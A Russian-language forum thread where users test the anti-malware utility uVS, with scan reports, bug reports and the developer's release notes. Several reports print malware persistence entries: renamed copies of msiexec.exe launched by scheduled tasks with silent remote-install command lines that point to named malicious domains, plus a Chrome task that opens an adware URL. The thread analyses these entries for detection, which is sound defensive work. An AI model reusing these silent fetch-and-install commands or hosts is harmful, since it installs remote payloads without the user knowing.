uVS - Тестирование

[PR55.RP55 82]

Demkd

http://www.tehnari.ru/f35/t260199/index2.html

----------------------

Полное имя                  C:\PROGRAM FILES (X86)\XBZNZDRBWUF.EXE
Имя файла                   XBZNZDRBWUF.EXE
Тек. статус                 ?ВИРУС? ПРОВЕРЕННЫЙ ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                            
www.virustotal.com          2018-06-29
-                           Файл был чист на момент проверки.
                            
Удовлетворяет критериям     
КЛЮЧ: I ДЛЯ HTTP            ( ~ /I HTTP)(1) [skip (0)]
                            
Сохраненная информация      на момент создания образа
Статус                      ПРОВЕРЕННЫЙ в автозапуске
File_Id                     5A74A3E814000
Linker                      9.0
Размер                      73216 байт
Создан                      03.01.1601 в 20:33:16
Изменен                     03.01.1601 в 20:33:16
                            
TimeStamp                   02.02.2018 в 17:46:16
EntryPoint                  +
OS Version                  6.0
Subsystem                   Windows graphical user interface (GUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   32-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано Microsoft Windows
                            
Оригинальное имя            msiexec.exe
Версия файла                5.0.7601.24052 (win7sp1_ldr.180202-0600)
Описание                    Windows® installer
Copyright                   © Microsoft Corporation. All rights reserved.
Производитель               Microsoft Corporation
                            
Доп. информация             на момент обновления списка
CmdLine                     /Q /I HTTP://FRESHREFRESHNERER186RB.INFO/21KG9WW18H1.QRA
SHA1                        75EF26FDCA12A29C37FE070065F7EE6712ECA247
MD5                         06983C58F6D1CAE00A72CE5091715C79
                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\{A114291D-15AB-38A4-96A0-051FE3160E88}
Prefetcher                  C:\WINDOWS\Prefetch\Layout.ini

----------------------------------------

Полное имя                  C:\USERS\OSMAT\LWYE.EXE
Имя файла                   LWYE.EXE
Тек. статус                 ?ВИРУС? ПРОВЕРЕННЫЙ ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                            
www.virustotal.com          2018-06-29
-                           Файл был чист на момент проверки.
                            
Удовлетворяет критериям     
КЛЮЧ: I ДЛЯ HTTP            ( ~ /I HTTP)(1) [skip (0)]
                            
Сохраненная информация      на момент создания образа
Статус                      ПРОВЕРЕННЫЙ в автозапуске
File_Id                     5A74A3E814000
Linker                      9.0
Размер                      73216 байт
Создан                      14.07.2009 в 04:14:20
Изменен                     14.07.2009 в 04:14:20
                            
TimeStamp                   02.02.2018 в 17:46:16
EntryPoint                  +
OS Version                  6.0
Subsystem                   Windows graphical user interface (GUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   32-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано Microsoft Windows
                            
Оригинальное имя            msiexec.exe
Версия файла                5.0.7601.24052 (win7sp1_ldr.180202-0600)
Описание                    Windows® installer
Copyright                   © Microsoft Corporation. All rights reserved.
Производитель               Microsoft Corporation
                            
Доп. информация             на момент обновления списка
CmdLine                     /Q /I HTTP://LIVE-4GUP.COM/Z21VB61XKZ3Q.YIH
SHA1                        75EF26FDCA12A29C37FE070065F7EE6712ECA247
MD5                         06983C58F6D1CAE00A72CE5091715C79
                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\{FFF9CB7D-AC62-3D17-AADB-19D60A353A08}
--------------------------------------------------

   

Полное имя                  C:\USERS\OSMAT\APPDATA\ROAMING\EMMYZOUIEAA.EXE
Имя файла                   EMMYZOUIEAA.EXE
Тек. статус                 ?ВИРУС? ПРОВЕРЕННЫЙ ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                            
www.virustotal.com          2018-06-29
-                           Файл был чист на момент проверки.
                            
Удовлетворяет критериям     
КЛЮЧ: I ДЛЯ HTTP            ( ~ /I HTTP)(1) [skip (0)]
                            
Сохраненная информация      на момент создания образа
Статус                      ПРОВЕРЕННЫЙ в автозапуске
File_Id                     5A74A3E814000
Linker                      9.0
Размер                      73216 байт
Создан                      03.01.1601 в 20:33:16
Изменен                     03.01.1601 в 20:33:16
                            
TimeStamp                   02.02.2018 в 17:46:16
EntryPoint                  +
OS Version                  6.0
Subsystem                   Windows graphical user interface (GUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   32-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано Microsoft Windows
                            
Оригинальное имя            msiexec.exe
Версия файла                5.0.7601.24052 (win7sp1_ldr.180202-0600)
Описание                    Windows® installer
Copyright                   © Microsoft Corporation. All rights reserved.
Производитель               Microsoft Corporation
                            
Доп. информация             на момент обновления списка
CmdLine                     /Q /I HTTP://FRESHREFRESHNERER186.INFO/3H6EYI3KRY.86B
SHA1                        75EF26FDCA12A29C37FE070065F7EE6712ECA247
MD5                         06983C58F6D1CAE00A72CE5091715C79
                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\{0F456675-4487-6417-F110-6D52041D2B12}
Prefetcher                  C:\WINDOWS\Prefetch\Layout.ini

---------------------------------------------------------

Полное имя                  C:\WINDOWS\SYSWOW64\QAYRUOPSOK.EXE
Имя файла                   QAYRUOPSOK.EXE
Тек. статус                 ?ВИРУС? ПРОВЕРЕННЫЙ ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                            
www.virustotal.com          2018-06-29
-                           Файл был чист на момент проверки.
                            
Удовлетворяет критериям     
КЛЮЧ: I ДЛЯ HTTP            ( ~ /I HTTP)(1) [skip (0)]
                            
Сохраненная информация      на момент создания образа
Статус                      ПРОВЕРЕННЫЙ в автозапуске
File_Id                     5A74A3E814000
Linker                      9.0
Размер                      73216 байт
Создан                      14.07.2009 в 04:14:20
Изменен                     14.07.2009 в 04:14:20
                            
TimeStamp                   02.02.2018 в 17:46:16
EntryPoint                  +
OS Version                  6.0
Subsystem                   Windows graphical user interface (GUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   32-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано Microsoft Windows
                            
Оригинальное имя            msiexec.exe
Версия файла                5.0.7601.24052 (win7sp1_ldr.180202-0600)
Описание                    Windows® installer
Copyright                   © Microsoft Corporation. All rights reserved.
Производитель               Microsoft Corporation
                            
Доп. информация             на момент обновления списка
CmdLine                     /Q /I HTTP://LIVE-4GUP.COM/GTGRRHJVFVIX.MTP
SHA1                        75EF26FDCA12A29C37FE070065F7EE6712ECA247
MD5                         06983C58F6D1CAE00A72CE5091715C79
                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\{D6B75649-5992-BB36-B131-13ABE0D76560}

----------------------------------------------------

1) Это как ?

Вроде недавно были выявлены новые проблемы с проверкой ЭЦП в Windows.

2) Я уже раз: 8 говорил\предлагал реализовать автоматическое сопоставление SHA1

на выявление множественных однотипных  SHA1 в системе с присвоением им соответствующего статуса.

 

+ вносить в Инфо. файла запись с перечислением всех файлов с однотипным  SHA1

 

                            

[alamor 69]

3 часа назад, PR55.RP55 сказал:

) Это как ?

Вроде недавно были выявлены новые проблемы с проверкой ЭЦП в Windows.

нету тут проблем с проверкой ЭЦП. Это скопированный и переименованный системный файл msiexec.exe. Так что всё правильно. В информации всё нужное есть.

[Vvvyg 12]

Есть такая задача:

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{83F346CB-42DE-469A-8501-40A8AE73A034}\Actions
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" http://mods-new.com/cl/?guid=4uvkhj4eripsplgfborouyfqnpxg8f12&prid=1&pid=4_1344_0

А удалить её по delref по образу нельзя, только вместе с хромом. Непорядок.

WIN-DC067KCHEHA_2018-07-05_16-00-00.7z

[PR55.RP55 82]

В 25.03.2018 at 5:54 PM, demkd сказал:

посмотрю

Между прочем: Март месяц !

Итак тема:  http://www.tehnari.ru/f35/t260156/

Веб Push-уведомления

https://support.mozilla.org/ru/kb/veb-push-uvedomleniya-v-firefox?as=u&utm_source=inproduct

Конкретно по теме.

Сайт: 

agefeed.com

перенаправляет на: 

https://55938.pushstat.com/i_3.php?c=100&st_1=1

Где происходит запрос ( см.фото)

[demkd 619]

10 минут назад, PR55.RP55 сказал:

Веб Push-уведомления

это надо ковырять базы лисы, а с этим есть проблема

 

В 06.07.2018 at 12:32 AM, Vvvyg сказал:

А удалить её по delref по образу нельзя, только вместе с хромом. Непорядок.

это да, такова особенность uVS он работает с файлами,  а не отдельным записями где-то там, в данном случае надо использовать что-то более стандартное.

[PR55.RP55 82]

Demkd пишет:     это надо ковырять базы лисы, а с этим есть проблема  

А, что мешает написать разработчикам...

Представиться;  указать на проблему и совместно её решить.

----------

Проблема ( как видно из темы ) Касается и IE и Хром-а.

 

 

[demkd 619]

8 часов назад, PR55.RP55 сказал:

А, что мешает написать разработчикам...

А причем тут разрабы, формат известен, проблема во времени необходимом на интеграцию sql в uVS и само совместимостью такого комбайна с PE, со временем вопрос решится буду смотреть.

[PR55.RP55 82]

При попытке выполнить  в uVS:  "Открыть в браузере отчёт"

404 - Запрашиваемая страница не найдена.

https://www.virustotal.com/latest-report.html?resource=bdaa128de70313feb65469a1b1518fd048734f54

При том, что SHA файла есть:

https://www.virustotal.com/ru/file/fce6b3c60fd50d2d12f6379da5734380dc888931860e68f6e3ae2bb0c54582ac/analysis/

И так для всех файлов.

 

[demkd 619]

---------------------------------------------------------
 4.0.13
---------------------------------------------------------
 o Обновлена функция открытия отчета по хэшу файла на VT.

 o Улучшена функция анализа командной строки.

 o Добавлена поддерджка расширений новых версий Firefox x86/x64.

 

[PR55.RP55 82]

 У меня уже несколько дней при обращении к V.T. выдаёт ошибку:

Error:  [Ошибка номер 12045]

[demkd 619]

11 минут назад, PR55.RP55 сказал:

Error:  [Ошибка номер 12045]

12045 - проблема с сертификатом, а это значит или подключение через совсем уж кривую проксю или обращение идет совсем не к VT и стоит проверить dns и систему в целом, ну или время на компе мягко говоря далекое от реального
У меня работает нормально и проблем с сертификатом у VT не предвидится до 3 февраля 2020 года.

[PR55.RP55 82]

+

При обращении к virusscan.jotti.org

Error:  [Ошибка номер 12157]

---------

Системное время в порядке.

DNS -  без изменений.

 

[demkd 619]

10 минут назад, PR55.RP55 сказал:

Error:  [Ошибка номер 12157] 

Это из той же оперы, проблемы с https соединением, лечить систему надо, что-то в ней не так. Рекомендую открыть в IE страничку VT и добиться того что бы она таки открывалась, а не выдавала ошибку, она как раз всегда редиректится на https.

[demkd 619]

Вчера попался случай со старым zec майнером, но с интересным обвесом в виде нескольких отдельных модулей защиты, пришлось кое-что улучшить.
---------------------------------------------------------
 4.0.14
---------------------------------------------------------
 o Добавлена экспериментальная функция обнаружения внедренных потоков в известные системные процессы (пока только для 32-х битных процессов).
   В случае обнаржуения в лог выводится строка:
   Injected thread detected in process полный_путь [PID], tid=TID
   Функция дополняет старый функционал по обнаружению потоков на базе внедренных DLL.
   (!) В WinXP x64 функция может работать неправильно.

 o URL в параметрах запусках теперь автоматически получает статус подозрительного объекта.

 o Новый параметр bFakeName
   [Settings]
   ; Использовать случайное имя главного окна для обхода блокировки запуска по содержимому заголовка.
     bFakeName (по умолчанию 0)

[santy 153]

40 минут назад, demkd сказал:

---------------------------------------------------------
 4.0.14
---------------------------------------------------------

 

demkd,

пока что с ошибкой идет обновление. в 4.0.13 все было ок.

Цитата

07.08.2018 20:59:35 Получение списка файлов... [Ok]
07.08.2018 20:59:35 Построение списка файлов для обновления... [Ok]
07.08.2018 20:59:35 Новых хэшей в базе SHA\VT1: 0
07.08.2018 20:59:35 Доступно обновление файлов:
07.08.2018 20:59:35 E:\soft\avirus\Universal Virus Sniffer latest\DOC\WhatsNew.txt [Ошибка]
07.08.2018 20:59:35 Сервис временно недоступен.
07.08.2018 20:59:35 Обновление завершено.

 

[demkd 619]

4 часа назад, santy сказал:

пока что с ошибкой идет обновление. в 4.0.13 все было ок.

ага, wahtsnew забыл обновить, теперь все должно быть нормально.

[Vvvyg 12]

Тем не менее, на 23 ч. МСК с обновлением всё также...

[demkd 619]

8 часов назад, Vvvyg сказал:

Тем не менее, на 23 ч. МСК с обновлением всё также...

В течении часа заработает, проблема была не только в whatsnew.

[PR55.RP55 82]

Demkd

Я вот, что подумал.

uVS проверяет ЭЦП\сертификат - каталог подписей.

А, что, если  использовать данные из:  System32\catroot

для выявления объектов = составления списка.

Пример:

epfwwfpr.cat  С:\Program Files\ESET\ESET NOD32 Antivirus\Drivers\epfwwfpr

ehdrv.cat           С:\Program Files\ESET\ESET NOD32 Antivirus\Drivers\ehdrv

В том числе работать с:  .inf  файлами - сведениями для установки в качестве доп. источника информации.

Есть:  .inf файл к драйверу, или нет, какую информацию содержит, даты создания, изменения и т.д.

 

[PR55.RP55 82]

1) Из под Live CD не корректно работает с ярлыками на _ рабочем столе.
при применении  _твиков  просто удаляет ярлыки.
( возможно на некоторых Live CD )

2) Полное имя                  C:\DOCUMENTS AND SETTINGS\!USER!\
Имя файла                   
Статус                      [Запускался неявно или вручную]
Инф. о файле                Не удается найти указанный файл.
Цифр. подпись               проверка не производилась
                            
Данная запись относиться к файлу с: 0 байт стандартным: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
в карантин файл помещается, как: ._DA39A3EE5E6B4B0D3255BFEF95601890AFD80709

И так...
Операция удаления ссылок добавлена в очередь: C:\DOCUMENTS AND SETTINGS\!USER!\
Как-то настораживает ?

[PR55.RP55 82]

+

https://www.virustotal.com

Чудовищно медленно открывается ( с этой модемой от  Yota )

А

https://www.virustotal.com/ru/

работает хорошо.

Можно в settings.ini  добавить настройки к какому ресурсу обращаться ?

это же относиться и к public API VirusTotal

Они сейчас всё через фильтр прогоняют по требованию Роскомнадзор-а.

[PR55.RP55 82]

+

Так скачать - часть три.  :)

CHR DefaultSearchKeyword: Default

А uVS  это видит ?

CHR DefaultSearchKeyword: Default -> yoursearching

CHR DefaultSearchKeyword: Default -> feed.sonic-search.com

 

[demkd 619]

7 часов назад, PR55.RP55 сказал:

( возможно на некоторых Live CD )

А кто заставляет использовать кривые или устаревшие образы?
 

7 часов назад, PR55.RP55 сказал:

2) Полное имя                  C:\DOCUMENTS AND SETTINGS\!USER!\

Надо изначальный путь из которого получается это, тогда можно будет посмотреть.
 

7 часов назад, PR55.RP55 сказал:

Чудовищно медленно открывается ( с этой модемой от  Yota )

Потому что там новый интерфейс, а русскую версию еще не обновили, обновят будет так же медленно.
 

3 часа назад, PR55.RP55 сказал:

А uVS  это видит ?

CHR DefaultSearchKeyword: Default -> yoursearching 

Понятия не имею что использует этот ключ, ничего из изветного мне его не использует, поэтому не вижу смысла его добавлять.

[PR55.RP55 82]

14 часов назад, demkd сказал:

Надо изначальный путь из которого получается это, тогда можно будет посмотреть.

1) Данная ошибка наблюдается на версии: 4.0.13 и 4.0.14  на предыдущих нет.

на ХР SP3

1.2) Из под Live CD Win 10.0.1 - > = 4.0.14 с выбором неактивной системы ошибки нет.

2)  Справка:

https://getadmx.com/?Category=Chrome&Policy=Google.Policies.Chrome::DefaultSearchProviderKeyword

Default search provider keyword

+

DefaultSearchProviderName

и т.д.

Цитата

    

Омнибокс - такое название получило универсальное поле для ввода строк в браузере на основе Хромиума. Если в омнибокс написать адрес сайта, то он просто перейдет по соответствующему адресу, если написать поисковый запрос, то будет осуществлен поиск в соответствии с выбранной поисковой системой. Кроме того, специальным образом формируя строку запроса через омнибокс можно указать, например, что не смотря на выбранную систему поиска, поиск осуществлялся бы через другую систему.

 

[alamor 69]

1) По поводу поисковиков Хрома уже писал, что нужно добавить в обработку файл со списком поисковиков Хрома. Там обычная база SQL, не запароленная.

2) Предлагаю зарегистрировать отдельный акк для uVS на VirustoTotal. Полученный там API key оформить его как публичный (снимаются ограничения по IP и это делается бесплатно) и чтобы он был бы в настройках программы по умолчанию. Тогда сразу после скачивания программы с настройками по умолчанию можно будет проверять файлы через VT API.

3)

22 часов назад, demkd сказал:

Потому что там новый интерфейс, а русскую версию еще не обновили, обновят будет так же медленно.

Так хоть пока они не перевели на этот htm5, хотелось бы пользоваться "быстрыми" страницами со старой системой. Надеюсь они не скоро их переведут.